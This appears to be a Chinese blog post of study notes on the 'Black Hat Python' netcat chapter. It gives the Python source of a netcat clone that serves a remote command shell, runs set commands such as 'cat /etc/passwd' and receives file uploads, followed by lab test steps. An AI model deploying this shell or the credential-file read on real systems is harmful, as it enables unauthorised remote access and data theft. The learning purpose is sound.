06 黑帽子:netcat

最新推荐文章于 2024-05-16 17:57:54 发布
最新推荐文章于 2024-05-16 17:57:54 发布
阅读量54 收藏
点赞数 1
文章标签: 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54186180/article/details/131034452
版权 

#natcat.py
import argparse
#from dataclasses import dataclass
#from fileinput import close
#from inspect import FullArgSpec
#from inspect import ArgSpec
#from inspect import FullArgSpec
import socket
import shlex
#from sqlite3 import connect
#from ssl import SOL_SOCKET
import subprocess
import sys
#from textwrap import wrap
import textwrap
import threading

def execute(cmd):
    cmd=cmd.strip()
    if not cmd:
        return
    output =subprocess.check_output(shlex.split(cmd),
                                    stderr=subprocess.STDOUT)
    return output.decode()

class NetCat:
    def __init__(self,args,buffer=None):
        #pass
        self.args=args
        self.buffer=buffer
        self.socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)

    def run(self):
        if self.args.listen:
            self.listen()
        else:
            self.send()

    def send(self):
        self.socket.connect((self.args.target,self.args.port))
        if self.buffer:
            self.socket.send(self.buffer)
        
        try:
            while True:
                recv_len =1
                response=''
                while recv_len:
                    data =self.socket.recv(4096)
                    recv_len=len(data)
                    response+=data.decode()
                    if recv_len<4096:
                        break
                if response:
                    print(response)
                    buffer=input('> ')#gai
                    #buffer='> '
                    buffer+='\n'
                    self.socket.send(buffer.encode())
        except KeyboardInterrupt:
            print("user terminated.")
            self.socket.close()
            sys.exit()

    def listen(self):
        self.socket.bind((self.args.target,self.args.port))
        self.socket.listen(5)
        while True:
            client_socket, _ =self.socket.accept()
            client_thread=threading.Thread(
                target=self.handle,args=(client_socket,)
            )
            client_thread.start()

    def handle(self,client_socket):
        if self.args.execute:
            output =execute(self.args.execute)
            client_socket.send(output.encode())
            
        elif self.args.upload:
            file_buffer =b''
            while True:
                data=client_socket.recv(4096)
                #print(data.decode)#jia
                if data:
                    file_buffer +=data
                else:
                    break
            with open(self.args.upload, 'wb') as f:
                f.write(file_buffer)
            message=f'Saved file {self.args.upload}'
            client_socket.send(message.encode())
            
         
        elif self.args.command:
            cmd_buffer=b''
            while True:
                try:
                    client_socket.send(b'BHP: #>')
                    while '\n' not in cmd_buffer.decode():
                        cmd_buffer +=client_socket.recv(64)
                    response=execute(cmd_buffer.decode())
                    if response:
                        client_socket.send(response.encode())
                    cmd_buffer=b''
                except Exception as e:
                    print(f'server killed {e}')
                    self.socket.close()
                    sys.exit()

if __name__=='__main__':
    parser=argparse.ArgumentParser(
        description="BHP net tool",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent('''Example:
            netcat.py -t 192.168.0.1 -p 5555 -l -c #command shell
            netcat.py -t 192.168.0.1 -p 5555 -l -u=mytest.txt #upload to file
            netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\" # excute command
            echo 'ABC' | ./netcat.py -t 192.168.0.1 -p 135 # echo text to server port 135
            netcat.py -t 192.168.0.1 -p 5555 # connect tp server
        ''')
    )
    parser.add_argument('-c','--command',action= 'store_true',help='command shell')
    parser.add_argument('-e','--execute',help='execute specified command')
    parser.add_argument('-l','--listen',action='store_true',help='listen')
    parser.add_argument('-p','--port',type=int,default=5555,help='specified port')
    parser.add_argument('-t','--target',default='192.168.0.1',help='specified IP')
    parser.add_argument('-u','--upload',help='upload file')
    #parser.add_argument()
    args= parser.parse_args()
    if args.listen:
        buffer =''
    else:
        buffer=sys.stdin.read()
        
    nc=NetCat(args,buffer.encode())
    nc.run()

 

第一个测试,第一窗口,在代码目录,运行服务端。

python3 netcat.py -t 10.0.2.15 -p 5555 -l -c   (回车)

 

 

第二窗口,在代码目录,运行客户端

python3 netcat.py -t 10.0.2.15 -p 5555  (回车)

 

Ctrl+D

 

ls -la (回车)

 

Ctrl+c退出测试,开始进行第二个测试,第一窗口,输入命令

python3 netcat.py -t 10.0.2.15 -p 5555 -l -e="cat /etc/passwd"(回车)

 

测试二,在第二个窗口,输入,

python3 netcat.py -t 10.0.2.15 -p 5555

 

回车

 

Ctrl+D

 

测试二,第二个窗口操作方法二,先ctrl+c退出。使用nc。

退出

 

nc 10.0.2.15 5555     (回车)

 

在两个窗口,先使用ctrl+c退出,进行第三个测试,

 有错误提示

查到说,改成buffer = ‘> ’

不过,会有影响,比如:(第一个测试,报错)

 

Ctrl+c,退出,进行第四个测试,第一个窗口

python3  netcat.py -t 10.0.2.15 -p 5555 -l -u=mytest.txt(回车)

注意!!!文件会自行在服务端目录下创建。(如果已经存在,则会覆盖原来的内容)

 

第二个窗口

nc 10.0.2.15 5555(回车)

 

然后随意输入一些字符,ctrl+C退出

 

第一个窗口,服务端也退出,cat

查看

 

回车

 

与在客户端随意输入的一样

(文件)输入

 

神呢~救救孩子吧
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅谈Python帽子取代netcat
09-20
本篇文章通过一个小小实例给大家分析了Python帽子取代netcat的过程以及相关知识点,对此有兴趣的朋友可以学习下。
Python帽子:取代netcat
Angie_Q的博客
12-11 899
按照各位大佬的博客来,端口连接的命令始终连接不上。 后来问了同学,在开了监听之后: 使用书上的代码连接不能成功,连接的命令改成:nc www.baidu.com 80(同理 监听本地就改成 nc 127.0.0.1 8888)
python帽子2】netcat.py编写及使用说明
WEL测试
05-26 798
Black hat python 2,的netcat.py脚本使用
python帽子netcat(chapter1)
samohyes的博客
06-17 1846
大概耗时一天时间,我完成了netcat的简单实现,这个netcat能够完成的功能是在客户端进行简单的命令(如ls,pwd,遗憾的是不能进行cd操作,受限于subprocess的功能),进行文件内容输入。 大致的代码和书上的一样,不过书上的代码有点问题。我折腾了很久,在client_handler的if len(upload_destination)函数中如果使用书上的代码,会发现它停留在whil
Python 帽子》学习笔记 - netcat 介绍1- Day 5
信安工匠
03-24 790
netcat 被称为网络瑞士军刀,是一个功能强大设计优雅的网络工具。 netcat 介绍 netcat 是什么,引用 wiki 的说明如下: Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections usi...
nasT:Netcat 和 Sed,一起
06-30
Netcat 和 Sed,一起 这是一个完全用 UNIX 实用程序编写的网络服务器。 它包括一个允许生成处理程序和数据库连接的 makefile。 有很多 CSS 是因为我们无耻地从 GNU 那里偷走了它。 欢迎拉取请求。
网安工具系列:netcat(主要时windows安装、套接字流以及详细使用教程)
01-06
网安工具系列:netcat(主要时windows安装、套接字流以及详细使用教程)
tlscat:Netcat 喜欢在 Golang 中启用 tls
06-01
猫猫 启用了 TLS(传输层安全)的 Netcat 类似工具 用法 连接
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8222
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
python(环境安装)搭建、pycharm安装、背景改为白色详细文章
2301_77161927的博客
05-13 392
python(环境搭建)安装、pycharm安装、背景颜色改为白色。
python学习-使用pandas库分析excel表,并导出所需的表
SixSix的自留地
05-16 94
使用pandas库分析excel表中多个子表的数据
印度股票实时行情数据API接口
最新发布
2401_83243390的博客
05-16 217
印度股票实时行情数据API接口。指定股票代码,获取该只股票的实时行情(开、高、低、收、量)
力扣 516. 最长回文子序列 python AC
qq_63443032的博客
05-12 571
二维dp
python项目如何读取配置文件(配置端口号,ip等等)
weixin_42759398的博客
05-16 117
然后在文件夹内新建一个config.ini。这样就能将配置和代码分离。
PythonPython中变量或者函数加下划线‘_‘的含义
yangweipeng708的博客
05-14 568
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码中的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python中,变量或函数前面加一个下划线(
python3.6.8安装Transformers
筱阳的博客
05-13 620
4.transformers安装。
python函数
2301_80040613的博客
05-13 920
语法:def 函数名(参数列表):函数体#无参hello()#有参return a+b。
将指定文件夹下每张用LabelImg标注的图片中标注部分抠出来保存到指定文件夹下。
weixin_44119674的博客
05-10 129
将指定文件夹下每张用LabelImg标注的图片中标注部分抠出来保存到指定文件夹下。
warning: netcat-1.225-1.el8.x86_64(1).rpm: Header V4 RSA/SHA256 Signature, key ID 2f86d6a1: NOKEY
08-26
这个警告提示是由于缺少安装软件包所需的 GPG 公钥造成的。在安装软件包时,操作系统会验证软件包的签名,以确保其来源可信。当系统找不到软件包对应的公钥时,就会产生这个警告。 你可以通过以下方式解决这个问题...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值